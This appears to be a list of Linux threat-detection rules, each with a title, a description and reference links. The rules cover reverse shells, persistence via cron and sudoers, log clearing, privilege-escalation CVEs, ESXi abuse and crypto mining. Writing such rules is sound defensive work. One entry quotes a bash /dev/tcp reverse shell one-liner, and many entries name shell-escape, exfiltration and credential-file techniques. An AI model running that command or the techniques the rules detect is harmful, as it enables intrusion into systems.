System and Hardware Information Discovery Detects system information discovery commands https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1082/T1082.md#atomic-test-4---linux-vm-check-via-hardware
System Shutdown/Reboot - Linux Adversaries may shutdown/reboot systems to interrupt access to, or aid in the destruction of, those systems. https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1529/T1529.md
Unix Shell Configuration Modification Detect unix shell configuration modification. Adversaries may establish persistence through executing malicious commands triggered when a new shell is opened. https://objective-see.org/blog/blog_0x68.html, https://web.archive.org/web/20221204161143/https://www.glitch-cat.com/p/green-lambert-and-attack, https://www.anomali.com/blog/pulling-linux-rabbit-rabbot-malware-out-of-a-hat
Steganography Unzip Hidden Information From Picture File Detects extracting of zip file from image file https://zerotoroot.me/steganography-hiding-a-zip-in-a-jpeg-file/
System Owner or User Discovery - Linux Detects the execution of host or user discovery utilities such as "whoami", "hostname", "id", etc. Adversaries may use the information from System Owner/User Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions. https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1033/T1033.md
Webshell Remote Command Execution Detects possible command execution by web application/web shell Personal Experience of the Author
Equation Group Indicators Detects suspicious shell commands used in various Equation Group scripts and tools https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1
Buffer Overflow Attempts Detects buffer overflow attempts in Unix system log files https://github.com/ossec/ossec-hids/blob/1ecffb1b884607cb12e619f9ab3c04f530801083/etc/rules/attack_rules.xml
Commands to Clear or Remove the Syslog - Builtin Detects specific commands commonly used to remove or empty the syslog https://www.virustotal.com/gui/file/fc614fb4bda24ae8ca2c44e812d12c0fab6dd7a097472a35dd12ded053ab8474
Remote File Copy Detects the use of tools that copy files from or to remote systems https://attack.mitre.org/techniques/T1105/
Code Injection by ld.so Preload Detects the ld.so preload persistence file. See `man ld.so` for more information. https://man7.org/linux/man-pages/man8/ld.so.8.html
Nimbuspwn Exploitation Detects exploitation of Nimbuspwn privilege escalation vulnerability (CVE-2022-29799 and CVE-2022-29800) https://www.microsoft.com/security/blog/2022/04/26/microsoft-finds-new-elevation-of-privilege-linux-vulnerability-nimbuspwn/, https://github.com/Immersive-Labs-Sec/nimbuspwn
Potential Suspicious BPF Activity - Linux Detects the presence of "bpf_probe_write_user" BPF helper-generated warning messages. Which could be a sign of suspicious eBPF activity on the system. https://redcanary.com/blog/ebpf-malware/, https://man7.org/linux/man-pages/man7/bpf-helpers.7.html
Shellshock Expression Detects shellshock expressions in log files https://owasp.org/www-pdf-archive/Shellshock_-_Tudor_Enache.pdf
Privileged User Has Been Created Detects the addition of a new user to a privileged group such as "root" or "sudo" https://digital.nhs.uk/cyber-alerts/2018/cc-2825, https://linux.die.net/man/8/useradd, https://github.com/redcanaryco/atomic-red-team/blob/25acadc0b43a07125a8a5b599b28bbc1a91ffb06/atomics/T1136.001/T1136.001.md#atomic-test-5---create-a-new-user-in-linux-with-root-uid-and-gid
Linux Command History Tampering Detects commands that try to clear or tamper with the Linux command history. This technique is used by threat actors in order to evade defenses and execute commands without them being recorded in files such as "bash_history" or "zsh_history". https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1070.003/T1070.003.md, https://www.hackers-arise.com/post/2016/06/20/covering-your-bash-shell-tracks-antiforensics, https://www.cadosecurity.com/spinning-yarn-a-new-linux-malware-campaign-targets-docker-apache-hadoop-redis-and-confluence/
Suspicious Activity in Shell Commands Detects suspicious shell commands used in various exploit codes (see references) https://web.archive.org/web/20170319121015/http://www.threatgeek.com/2017/03/widespread-exploitation-attempts-using-cve-2017-5638.html, https://github.com/rapid7/metasploit-framework/blob/eb6535009f5fdafa954525687f09294918b5398d/modules/exploits/multi/http/struts_code_exec_exception_delegator.rb, http://pastebin.com/FtygZ1cg, https://artkond.com/2017/03/23/pivoting-guide/
Suspicious Log Entries Detects suspicious log entries in Linux log files https://github.com/ossec/ossec-hids/blob/master/etc/rules/syslog_rules.xml
Suspicious Reverse Shell Command Line Detects suspicious shell commands or program code that may be executed or used in command line to establish a reverse shell https://alamot.github.io/reverse_shells/
Space After Filename Detects space after filename https://attack.mitre.org/techniques/T1064
Suspicious Use of /dev/tcp Detects suspicious command with /dev/tcp https://www.andreafortuna.org/2021/03/06/some-useful-tips-about-dev-tcp/, https://book.hacktricks.xyz/shells/shells/linux, https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1046/T1046.md#atomic-test-1---port-scan
JexBoss Command Sequence Detects suspicious command sequence that JexBoss https://www.us-cert.gov/ncas/analysis-reports/AR18-312A
Symlink Etc Passwd Detects suspicious command lines that look as if they would create symbolic links to /etc/passwd https://www.qualys.com/2021/05/04/21nails/21nails.txt
PwnKit Local Privilege Escalation Detects potential PwnKit exploitation CVE-2021-4034 in auth logs https://twitter.com/wdormann/status/1486161836961579020
Relevant ClamAV Message Detects relevant ClamAV messages https://github.com/ossec/ossec-hids/blob/1ecffb1b884607cb12e619f9ab3c04f530801083/etc/rules/clam_av_rules.xml
Modifying Crontab Detects suspicious modification of crontab file. https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1053.003/T1053.003.md
Guacamole Two Users Sharing Session Anomaly Detects suspicious session with two users present https://research.checkpoint.com/2020/apache-guacamole-rce/
SSHD Error Message CVE-2018-15473 Detects exploitation attempt using public exploit code for CVE-2018-15473 https://github.com/Rhynorater/CVE-2018-15473-Exploit
Suspicious OpenSSH Daemon Error Detects suspicious SSH / SSHD error messages that indicate a fatal or suspicious error that could be caused by exploiting attempts https://github.com/openssh/openssh-portable/blob/c483a5c0fb8e8b8915fad85c5f6113386a4341ca/ssherr.c, https://github.com/ossec/ossec-hids/blob/1ecffb1b884607cb12e619f9ab3c04f530801083/etc/rules/sshd_rules.xml
Sudo Privilege Escalation CVE-2019-14287 - Builtin Detects users trying to exploit sudo vulnerability reported in CVE-2019-14287 https://www.openwall.com/lists/oss-security/2019/10/14/1, https://access.redhat.com/security/cve/cve-2019-14287, https://twitter.com/matthieugarin/status/1183970598210412546
Disabling Security Tools - Builtin Detects disabling security tools https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.004/T1562.004.md
Persistence Via Sudoers Files Detects creation of sudoers file or files in "sudoers.d" directory which can be used a potential method to persiste privileges for a specific user. https://github.com/h3xduck/TripleCross/blob/1f1c3e0958af8ad9f6ebe10ab442e75de33e91de/apps/deployer.sh
Suspicious Named Error Detects suspicious DNS error messages that indicate a fatal or suspicious error that could be caused by exploiting attempts https://github.com/ossec/ossec-hids/blob/1ecffb1b884607cb12e619f9ab3c04f530801083/etc/rules/named_rules.xml
Suspicious VSFTPD Error Messages Detects suspicious VSFTPD error messages that indicate a fatal or suspicious error that could be caused by exploiting attempts https://github.com/dagwieers/vsftpd/
Potentially Suspicious Shell Script Creation in Profile Folder Detects the creation of shell scripts under the "profile.d" path. https://blogs.jpcert.or.jp/en/2023/05/gobrat.html, https://jstnk9.github.io/jstnk9/research/GobRAT-Malware/, https://www.virustotal.com/gui/file/60bcd645450e4c846238cf0e7226dc40c84c96eba99f6b2cffcd0ab4a391c8b3/detection, https://www.virustotal.com/gui/file/3e44c807a25a56f4068b5b8186eee5002eed6f26d665a8b791c472ad154585d1/detection
Triple Cross eBPF Rootkit Default LockFile Detects the creation of the file "rootlog" which is used by the TripleCross rootkit as a way to check if the backdoor is already running. https://github.com/h3xduck/TripleCross/blob/1f1c3e0958af8ad9f6ebe10ab442e75de33e91de/src/helpers/execve_hijack.c#L33
Persistence Via Cron Files Detects creation of cron file or files in Cron directories which could indicates potential persistence. https://github.com/microsoft/MSTIC-Sysmon/blob/f1477c0512b0747c1455283069c21faec758e29d/linux/configs/attack-based/persistence/T1053.003_Cron_Activity.xml
Linux Reverse Shell Indicator Detects a bash contecting to a remote IP address (often found when actors do something like 'bash -i >& /dev/tcp/10.0.0.1/4242 0>&1') https://github.com/swisskyrepo/PayloadsAllTheThings/blob/d9921e370b7c668ee8cc42d09b1932c1b98fa9dc/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md
Wget Creating Files in Tmp Directory Detects the use of wget to download content in a temporary directory such as "/tmp" or "/var/tmp" https://blogs.jpcert.or.jp/en/2023/05/gobrat.html, https://jstnk9.github.io/jstnk9/research/GobRAT-Malware/, https://www.virustotal.com/gui/file/60bcd645450e4c846238cf0e7226dc40c84c96eba99f6b2cffcd0ab4a391c8b3/detection, https://www.virustotal.com/gui/file/3e44c807a25a56f4068b5b8186eee5002eed6f26d665a8b791c472ad154585d1/detection
Triple Cross eBPF Rootkit Default Persistence Detects the creation of "ebpfbackdoor" files in both "cron.d" and "sudoers.d" directories. Which both are related to the TripleCross persistence method https://github.com/h3xduck/TripleCross/blob/12629558b8b0a27a5488a0b98f1ea7042e76f8ab/apps/deployer.sh
Linux Doas Conf File Creation Detects the creation of doas.conf file in linux host platform. https://research.splunk.com/endpoint/linux_doas_conf_file_creation/, https://www.makeuseof.com/how-to-install-and-use-doas/
Communication To Ngrok Tunneling Service - Linux Detects an executable accessing an ngrok tunneling endpoint, which could be a sign of forbidden exfiltration of data exfiltration by malicious actors https://twitter.com/hakluke/status/1587733971814977537/photo/1, https://ngrok.com/docs/secure-tunnels/tunnels/ssh-reverse-tunnel-agent
Communication To LocaltoNet Tunneling Service Initiated - Linux Detects an executable initiating a network connection to "LocaltoNet" tunneling sub-domains. LocaltoNet is a reverse proxy that enables localhost services to be exposed to the Internet. Attackers have been seen to use this service for command-and-control activities to bypass MFA and perimeter controls. https://localtonet.com/documents/supported-tunnels, https://cloud.google.com/blog/topics/threat-intelligence/unc3944-targets-saas-applications
Linux Crypto Mining Pool Connections Detects process connections to a Monero crypto mining pool https://www.poolwatch.io/coin/monero
Potentially Suspicious Malware Callback Communication - Linux Detects programs that connect to known malware callback ports based on threat intelligence reports. https://www.mandiant.com/resources/blog/triton-actor-ttp-profile-custom-attack-tools-detections, https://www.mandiant.com/resources/blog/ukraine-and-sandworm-team, https://www.elastic.co/guide/en/security/current/potential-non-standard-port-ssh-connection.html, https://thehackernews.com/2024/01/systembc-malwares-c2-server-analysis.html, https://www.cybereason.com/blog/sliver-c2-leveraged-by-many-threat-actors
Shell Invocation via Apt - Linux Detects the use of the "apt" and "apt-get" commands to execute a shell or proxy commands. Such behavior may be associated with privilege escalation, unauthorized command execution, or to break out from restricted environments. https://gtfobins.github.io/gtfobins/apt/, https://gtfobins.github.io/gtfobins/apt-get/
Scheduled Task/Job At Detects the use of at/atd which are utilities that are used to schedule tasks. They are often abused by adversaries to maintain persistence or to perform task scheduling for initial or recurring execution of malicious code https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1053.002/T1053.002.md
Suspicious Invocation of Shell via AWK - Linux Detects the execution of "awk" or it's sibling commands, to invoke a shell using the system() function. This behavior is commonly associated with attempts to execute arbitrary commands or escalate privileges, potentially leading to unauthorized access or further exploitation. https://gtfobins.github.io/gtfobins/awk/#shell, https://gtfobins.github.io/gtfobins/gawk/#shell, https://gtfobins.github.io/gtfobins/nawk/#shell, https://gtfobins.github.io/gtfobins/mawk/#shell
Decode Base64 Encoded Text Detects usage of base64 utility to decode arbitrary base64-encoded text https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1027/T1027.md
Linux Base64 Encoded Pipe to Shell Detects suspicious process command line that uses base64 encoded input for execution with a shell https://github.com/arget13/DDexec, https://www.mandiant.com/resources/blog/barracuda-esg-exploited-globally
Bash Interactive Shell Detects execution of the bash shell with the interactive flag "-i". https://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet, https://www.revshells.com/, https://linux.die.net/man/1/bash
BPFtrace Unsafe Option Usage Detects the usage of the unsafe bpftrace option https://embracethered.com/blog/posts/2021/offensive-bpf-bpftrace/, https://bpftrace.org/
Enable BPF Kprobes Tracing Detects common command used to enable bpf kprobes tracing https://embracethered.com/blog/posts/2021/offensive-bpf-bpftrace/, https://bpftrace.org/, https://www.kernel.org/doc/html/v5.0/trace/kprobetrace.html
Capabilities Discovery - Linux Detects usage of "getcap" binary. This is often used during recon activity to determine potential binaries that can be abused as GTFOBins or other. https://github.com/SaiSathvik1/Linux-Privilege-Escalation-Notes, https://github.com/carlospolop/PEASS-ng, https://github.com/diego-treitos/linux-smart-enumeration
Capsh Shell Invocation - Linux Detects the use of the "capsh" utility to invoke a shell. https://gtfobins.github.io/gtfobins/capsh/#shell, https://www.elastic.co/guide/en/security/current/linux-restricted-shell-breakout-via-linux-binary-s.html
Remove Immutable File Attribute Detects usage of the 'chattr' utility to remove immutable file attribute. https://www.trendmicro.com/en_us/research/22/i/how-malicious-actors-abuse-native-linux-tools-in-their-attacks.html
Linux Base64 Encoded Shebang In CLI Detects the presence of a base64 version of the shebang in the commandline, which could indicate a malicious payload about to be decoded https://www.trendmicro.com/pl_pl/research/20/i/the-evolution-of-malicious-shell-scripts.html, https://github.com/carlospolop/PEASS-ng/tree/master/linPEAS
Clipboard Collection with Xclip Tool Detects attempts to collect data stored in the clipboard from users with the usage of xclip tool. Xclip has to be installed. Highly recommended using rule on servers, due to high usage of clipboard utilities on user workstations. https://www.packetlabs.net/posts/clipboard-data-security/
Clear Linux Logs Detects attempts to clear logs on the system. Adversaries may clear system logs to hide evidence of an intrusion https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1070.002/T1070.002.md
Cat Sudoers Detects the execution of a cat /etc/sudoers to list all users that have sudo rights https://github.com/sleventyeleven/linuxprivchecker/
Commands to Clear or Remove the Syslog Detects specific commands commonly used to remove or empty the syslog. Which is often used by attacker as a method to hide their tracks https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1070.002/T1070.002.md
Crontab Enumeration Detects usage of crontab to list the tasks of the user https://blogs.jpcert.or.jp/en/2023/05/gobrat.html, https://jstnk9.github.io/jstnk9/research/GobRAT-Malware/, https://www.virustotal.com/gui/file/60bcd645450e4c846238cf0e7226dc40c84c96eba99f6b2cffcd0ab4a391c8b3/detection, https://www.virustotal.com/gui/file/3e44c807a25a56f4068b5b8186eee5002eed6f26d665a8b791c472ad154585d1/detection
Copy Passwd Or Shadow From TMP Path Detects when the file "passwd" or "shadow" is copied from tmp path https://blogs.blackberry.com/, https://twitter.com/Joseliyo_Jstnk/status/1620131033474822144
Remove Scheduled Cron Task/Job Detects usage of the 'crontab' utility to remove the current crontab. This is a common occurrence where cryptocurrency miners compete against each other by removing traces of other miners to hijack the maximum amount of resources possible https://www.trendmicro.com/en_us/research/22/i/how-malicious-actors-abuse-native-linux-tools-in-their-attacks.html
Linux Crypto Mining Indicators Detects command line parameters or strings often used by crypto miners https://www.poolwatch.io/coin/monero
Curl Usage on Linux Detects a curl process start on linux, which indicates a file download from a remote location or a simple web request to a remote server https://www.trendmicro.com/en_us/research/22/i/how-malicious-actors-abuse-native-linux-tools-in-their-attacks.html
Atlassian Confluence CVE-2022-26134 Detects spawning of suspicious child processes by Atlassian Confluence server which may indicate successful exploitation of CVE-2022-26134 https://www.volexity.com/blog/2022/06/02/zero-day-exploitation-of-atlassian-confluence/
Apache Spark Shell Command Injection - ProcessCreation Detects attempts to exploit an apache spark server via CVE-2014-6287 from a commandline perspective https://github.com/W01fh4cker/cve-2022-33891/blob/fd973b56e78bca8822caa3a2e3cf1b5aff5d0950/cve_2022_33891_poc.py, https://sumsec.me/2022/CVE-2022-33891%20Apache%20Spark%20shell%20command%20injection.html, https://github.com/apache/spark/pull/36315/files
DD File Overwrite Detects potential overwriting and deletion of a file using DD. https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1485/T1485.md#atomic-test-2---macoslinux---overwrite-file-with-dd
Potential Linux Process Code Injection Via DD Utility Detects the injection of code by overwriting the memory map of a Linux process using the "dd" Linux command. https://www.aon.com/cyber-solutions/aon_cyber_labs/linux-based-inter-process-code-injection-without-ptrace2/, https://github.com/AonCyberLabs/Cexigua/blob/34d338620afae4c6335ba8d8d499e1d7d3d5d7b5/overwrite.sh
Ufw Force Stop Using Ufw-Init Detects attempts to force stop the ufw using ufw-init https://blogs.blackberry.com/, https://twitter.com/Joseliyo_Jstnk/status/1620131033474822144
Linux Doas Tool Execution Detects the doas tool execution in linux host platform. This utility tool allow standard users to perform tasks as root, the same way sudo does. https://research.splunk.com/endpoint/linux_doas_tool_execution/, https://www.makeuseof.com/how-to-install-and-use-doas/
Shell Invocation via Env Command - Linux Detects the use of the env command to invoke a shell. This may indicate an attempt to bypass restricted environments, escalate privileges, or execute arbitrary commands. https://gtfobins.github.io/gtfobins/env/#shell, https://www.elastic.co/guide/en/security/current/linux-restricted-shell-breakout-via-linux-binary-s.html
ESXi Network Configuration Discovery Via ESXCLI Detects execution of the "esxcli" command with the "network" flag in order to retrieve information about the network configuration. https://www.crowdstrike.com/blog/hypervisor-jackpotting-ecrime-actors-increase-targeting-of-esxi-servers/, https://developer.broadcom.com/xapis/esxcli-command-reference/7.0.0/namespace/esxcli_network.html
ESXi Admin Permission Assigned To Account Via ESXCLI Detects execution of the "esxcli" command with the "system" and "permission" flags in order to assign admin permissions to an account. https://developer.broadcom.com/xapis/esxcli-command-reference/7.0.0/namespace/esxcli_system.html
ESXi Storage Information Discovery Via ESXCLI Detects execution of the "esxcli" command with the "storage" flag in order to retrieve information about the storage status and other related information. Seen used by malware such as DarkSide and LockBit. https://www.trendmicro.com/en_us/research/21/e/darkside-linux-vms-targeted.html, https://www.trendmicro.com/en_us/research/22/a/analysis-and-Impact-of-lockbit-ransomwares-first-linux-and-vmware-esxi-variant.html, https://developer.broadcom.com/xapis/esxcli-command-reference/7.0.0/namespace/esxcli_storage.html
ESXi Syslog Configuration Change Via ESXCLI Detects changes to the ESXi syslog configuration via "esxcli" https://support.solarwinds.com/SuccessCenter/s/article/Configure-ESXi-Syslog-to-LEM?language=en_US, https://developer.broadcom.com/xapis/esxcli-command-reference/7.0.0/namespace/esxcli_system.html
ESXi System Information Discovery Via ESXCLI Detects execution of the "esxcli" command with the "system" flag in order to retrieve information about the different component of the system. Such as accounts, modules, NTP, etc. https://www.crowdstrike.com/blog/hypervisor-jackpotting-ecrime-actors-increase-targeting-of-esxi-servers/, https://developer.broadcom.com/xapis/esxcli-command-reference/7.0.0/namespace/esxcli_system.html
ESXi Account Creation Via ESXCLI Detects user account creation on ESXi system via esxcli https://developer.broadcom.com/xapis/esxcli-command-reference/7.0.0/namespace/esxcli_system.html
ESXi VM List Discovery Via ESXCLI Detects execution of the "esxcli" command with the "vm" flag in order to retrieve information about the installed VMs. https://www.crowdstrike.com/blog/hypervisor-jackpotting-ecrime-actors-increase-targeting-of-esxi-servers/, https://developer.broadcom.com/xapis/esxcli-command-reference/7.0.0/namespace/esxcli_vm.html, https://www.secuinfra.com/en/techtalk/hide-your-hypervisor-analysis-of-esxiargs-ransomware/, https://www.trendmicro.com/en_us/research/22/e/new-linux-based-ransomware-cheerscrypt-targets-exsi-devices.html
ESXi VM Kill Via ESXCLI Detects execution of the "esxcli" command with the "vm" and "kill" flag in order to kill/shutdown a specific VM. https://www.crowdstrike.com/blog/hypervisor-jackpotting-ecrime-actors-increase-targeting-of-esxi-servers/, https://developer.broadcom.com/xapis/esxcli-command-reference/7.0.0/namespace/esxcli_vm.html, https://www.secuinfra.com/en/techtalk/hide-your-hypervisor-analysis-of-esxiargs-ransomware/, https://www.trendmicro.com/en_us/research/22/e/new-linux-based-ransomware-cheerscrypt-targets-exsi-devices.html
ESXi VSAN Information Discovery Via ESXCLI Detects execution of the "esxcli" command with the "vsan" flag in order to retrieve information about virtual storage. Seen used by malware such as DarkSide. https://www.trendmicro.com/en_us/research/21/e/darkside-linux-vms-targeted.html, https://www.trendmicro.com/en_us/research/22/a/analysis-and-Impact-of-lockbit-ransomwares-first-linux-and-vmware-esxi-variant.html, https://developer.broadcom.com/xapis/esxcli-command-reference/7.0.0/namespace/esxcli_vsan.html
File and Directory Discovery - Linux Detects usage of system utilities such as "find", "tree", "findmnt", etc, to discover files, directories and network shares. https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1083/T1083.md
File Deletion Detects file deletion using "rm", "shred" or "unlink" commands which are used often by adversaries to delete files left behind by the actions of their intrusion activity https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1070.004/T1070.004.md
Shell Execution via Find - Linux Detects the use of the find command to execute a shell. Such behavior may be associated with privilege escalation, unauthorized command execution, or exploitation attempt. https://gtfobins.github.io/gtfobins/find/#shell, https://www.elastic.co/guide/en/security/current/linux-restricted-shell-breakout-via-linux-binary-s.html
Shell Execution via Flock - Linux Detects the use of the "flock" command to execute a shell. Such behavior may be associated with privilege escalation, unauthorized command execution, or to break out from restricted environments. https://gtfobins.github.io/gtfobins/flock/#shell, https://www.elastic.co/guide/en/security/current/linux-restricted-shell-breakout-via-linux-binary-s.html
Shell Execution GCC - Linux Detects the use of the "gcc" utility to execute a shell. Such behavior may be associated with privilege escalation, unauthorized command execution, or to break out from restricted environments. https://gtfobins.github.io/gtfobins/gcc/#shell, https://gtfobins.github.io/gtfobins/c89/#shell, https://gtfobins.github.io/gtfobins/c99/#shell, https://www.elastic.co/guide/en/security/current/linux-restricted-shell-breakout-via-linux-binary-s.html
Shell Execution via Git - Linux Detects the use of the "git" utility to execute a shell. Such behavior may be associated with privilege escalation, unauthorized command execution, or to break out from restricted environments. https://gtfobins.github.io/gtfobins/git/#shell
OS Architecture Discovery Via Grep Detects the use of grep to identify information about the operating system architecture. Often combined beforehand with the execution of "uname" or "cat /proc/cpuinfo" https://blogs.jpcert.or.jp/en/2023/05/gobrat.html, https://jstnk9.github.io/jstnk9/research/GobRAT-Malware/, https://www.virustotal.com/gui/file/60bcd645450e4c846238cf0e7226dc40c84c96eba99f6b2cffcd0ab4a391c8b3/detection, https://www.virustotal.com/gui/file/3e44c807a25a56f4068b5b8186eee5002eed6f26d665a8b791c472ad154585d1/detection
Group Has Been Deleted Via Groupdel Detects execution of the "groupdel" binary. Which is used to delete a group. This is sometimes abused by threat actors in order to cover their tracks https://linuxize.com/post/how-to-delete-group-in-linux/, https://www.cyberciti.biz/faq/linux-remove-user-command/, https://www.cybrary.it/blog/0p3n/linux-commands-used-attackers/, https://linux.die.net/man/8/groupdel
Install Root Certificate Detects installation of new certificate on the system which attackers may use to avoid warnings when connecting to controlled web servers or C2s https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1553.004/T1553.004.md
Suspicious Package Installed - Linux Detects installation of suspicious packages using system installation utilities https://gist.githubusercontent.com/MichaelKoczwara/12faba9c061c12b5814b711166de8c2f/raw/e2068486692897b620c25fde1ea258c8218fe3d3/history.txt
Flush Iptables Ufw Chain Detect use of iptables to flush all firewall rules, tables and chains and allow all network traffic https://blogs.blackberry.com/, https://www.cyberciti.biz/tips/linux-iptables-how-to-flush-all-rules.html, https://twitter.com/Joseliyo_Jstnk/status/1620131033474822144
Local System Accounts Discovery - Linux Detects enumeration of local systeam accounts. This information can help adversaries determine which local accounts exist on a system to aid in follow-on behavior. https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1087.001/T1087.001.md, https://my.f5.com/manage/s/article/K589, https://man.freebsd.org/cgi/man.cgi?pwd_mkdb
Local Groups Discovery - Linux Detects enumeration of local system groups. Adversaries may attempt to find local system groups and permission settings https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1069.001/T1069.001.md
Potential GobRAT File Discovery Via Grep Detects the use of grep to discover specific files created by the GobRAT malware https://blogs.jpcert.or.jp/en/2023/05/gobrat.html, https://www.virustotal.com/gui/file/60bcd645450e4c846238cf0e7226dc40c84c96eba99f6b2cffcd0ab4a391c8b3/detection, https://www.virustotal.com/gui/file/3e44c807a25a56f4068b5b8186eee5002eed6f26d665a8b791c472ad154585d1/detection
Named Pipe Created Via Mkfifo Detects the creation of a new named pipe using the "mkfifo" utility https://dev.to/0xbf/use-mkfifo-to-create-named-pipe-linux-tips-5bbk, https://www.mandiant.com/resources/blog/barracuda-esg-exploited-globally
Potentially Suspicious Named Pipe Created Via Mkfifo Detects the creation of a new named pipe using the "mkfifo" utility in a potentially suspicious location https://dev.to/0xbf/use-mkfifo-to-create-named-pipe-linux-tips-5bbk, https://www.mandiant.com/resources/blog/barracuda-esg-exploited-globally
Mount Execution With Hidepid Parameter Detects execution of the "mount" command with "hidepid" parameter to make invisible processes to other users from the system https://blogs.blackberry.com/, https://www.cyberciti.biz/faq/linux-hide-processes-from-other-users/, https://twitter.com/Joseliyo_Jstnk/status/1620131033474822144
Potential Netcat Reverse Shell Execution Detects execution of netcat with the "-e" flag followed by common shells. This could be a sign of a potential reverse shell setup. https://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet, https://www.revshells.com/, https://www.hackingtutorials.org/networking/hacking-netcat-part-2-bind-reverse-shells/, https://www.infosecademy.com/netcat-reverse-shells/, https://man7.org/linux/man-pages/man1/ncat.1.html
Shell Execution via Nice - Linux Detects the use of the "nice" utility to execute a shell. Such behavior may be associated with privilege escalation, unauthorized command execution, or to break out from restricted environments. https://gtfobins.github.io/gtfobins/nice/#shell, https://www.elastic.co/guide/en/security/current/linux-restricted-shell-breakout-via-linux-binary-s.html
Nohup Execution Detects usage of nohup which could be leveraged by an attacker to keep a process running or break out from restricted environments https://gtfobins.github.io/gtfobins/nohup/, https://en.wikipedia.org/wiki/Nohup, https://www.computerhope.com/unix/unohup.htm
Suspicious Nohup Execution Detects execution of binaries located in potentially suspicious locations via "nohup" https://blogs.jpcert.or.jp/en/2023/05/gobrat.html, https://jstnk9.github.io/jstnk9/research/GobRAT-Malware/, https://www.virustotal.com/gui/file/60bcd645450e4c846238cf0e7226dc40c84c96eba99f6b2cffcd0ab4a391c8b3/detection, https://www.virustotal.com/gui/file/3e44c807a25a56f4068b5b8186eee5002eed6f26d665a8b791c472ad154585d1/detection
OMIGOD SCX RunAsProvider ExecuteScript Rule to detect the use of the SCX RunAsProvider ExecuteScript to execute any UNIX/Linux script using the /bin/sh shell. Script being executed gets created as a temp file in /tmp folder with a scx* prefix. Then it is invoked from the following directory /etc/opt/microsoft/scx/conf/tmpdir/. The file in that directory has the same prefix scx*. SCXcore, started as the Microsoft Operations Manager UNIX/Linux Agent, is now used in a host of products including Microsoft Operations Manager, Microsoft Azure, and Microsoft Operations Management Suite. https://www.wiz.io/blog/omigod-critical-vulnerabilities-in-omi-azure, https://github.com/Azure/Azure-Sentinel/pull/3059
OMIGOD SCX RunAsProvider ExecuteShellCommand Rule to detect the use of the SCX RunAsProvider Invoke_ExecuteShellCommand to execute any UNIX/Linux command using the /bin/sh shell. SCXcore, started as the Microsoft Operations Manager UNIX/Linux Agent, is now used in a host of products including Microsoft Operations Manager, Microsoft Azure, and Microsoft Operations Management Suite. https://www.wiz.io/blog/omigod-critical-vulnerabilities-in-omi-azure, https://github.com/Azure/Azure-Sentinel/pull/3059
Potential Perl Reverse Shell Execution Detects execution of the perl binary with the "-e" flag and common strings related to potential reverse shell activity https://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet, https://www.revshells.com/
Potential PHP Reverse Shell Detects usage of the PHP CLI with the "-r" flag which allows it to run inline PHP code. The rule looks for calls to the "fsockopen" function which allows the creation of sockets. Attackers often leverage this in combination with functions such as "exec" or "fopen" to initiate a reverse shell connection. https://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet, https://www.revshells.com/
Pnscan Binary Data Transmission Activity Detects command line patterns associated with the use of Pnscan for sending and receiving binary data across the network. This behavior has been identified in a Linux malware campaign targeting Docker, Apache Hadoop, Redis, and Confluence and was previously used by the threat actor known as TeamTNT https://www.cadosecurity.com/blog/spinning-yarn-a-new-linux-malware-campaign-targets-docker-apache-hadoop-redis-and-confluence, https://intezer.com/wp-content/uploads/2021/09/TeamTNT-Cryptomining-Explosion.pdf, https://regex101.com/r/RugQYK/1, https://www.virustotal.com/gui/file/beddf70a7bab805f0c0b69ac0989db6755949f9f68525c08cb874988353f78a9/content
Connection Proxy Detects setting proxy configuration https://attack.mitre.org/techniques/T1090/
Python Spawning Pretty TTY Via PTY Module Detects a python process calling to the PTY module in order to spawn a pretty tty which could be indicative of potential reverse shell activity. https://www.volexity.com/blog/2022/06/02/zero-day-exploitation-of-atlassian-confluence/
Python Reverse Shell Execution Via PTY And Socket Modules Detects the execution of python with calls to the socket and pty module in order to connect and spawn a potential reverse shell. https://www.revshells.com/
Inline Python Execution - Spawn Shell Via OS System Library Detects execution of inline Python code via the "-c" in order to call the "system" function from the "os" library, and spawn a shell. https://gtfobins.github.io/gtfobins/python/#shell
Remote Access Tool - Team Viewer Session Started On Linux Host Detects the command line executed when TeamViewer starts a session started by a remote host. Once a connection has been started, an investigator can verify the connection details by viewing the "incoming_connections.txt" log file in the TeamViewer folder. Internal Research
